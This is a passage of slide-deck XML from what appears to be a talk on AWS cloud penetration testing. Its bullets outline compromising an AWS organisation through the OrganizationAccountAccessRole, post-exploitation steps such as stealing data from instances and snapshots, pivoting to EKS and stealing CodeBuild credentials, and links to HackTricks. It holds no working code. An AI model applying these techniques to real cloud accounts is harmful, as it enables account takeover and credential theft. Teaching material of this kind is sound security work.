        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151900" y="4728000"/>
            <a:ext cx="48402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found children accounts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7" name="Google Shape;77;p12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78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Org Compromise</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221400" y="1057525"/>
            <a:ext cx="8772600" cy="28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By default the Management Account has Admin permissions on child accounts through the OrganizationAccountAccessRole role. (demo)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500" u="sng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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting#compromising-the-organization</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent4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84" name="Google Shape;84;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408800" y="4728000"/>
            <a:ext cx="6326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moved to Administrator in a child account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86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16="http://schemas.microsoft.com/office/drawing/2014/main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Post-exploitatio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8290200" cy="21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Get Web Console Access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Confused Deputy</a:t>
            </a:r>
            <a:endParaRPr sz="150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500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500" u="sng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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-iam-post-exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill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Steal information from Instances, Snapshots, Containers…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Pivot to EKS cluster</a:t>
            </a:r>
            <a:endParaRPr sz="1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s" sz="1500"/>
              <a:t>Stealing credentials from Code Build (demo)</a:t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92" name="Google Shape;92;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312650" y="4690975"/>
            <a:ext cx="68304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 b="1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Attack: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>We obtained a sensitive token to access Github</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt2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93" name="Google Shape;93;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7803800" y="191025"/>
            <a:ext cx="1190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>
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill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  <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="94" name="Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C957D4-E4F1-4D51-EC0C-C161461E948E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2066925" y="2276475"/>
            <a:ext cx="6324600" cy="571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2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="f01316">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://t.me/CyberFreeCourses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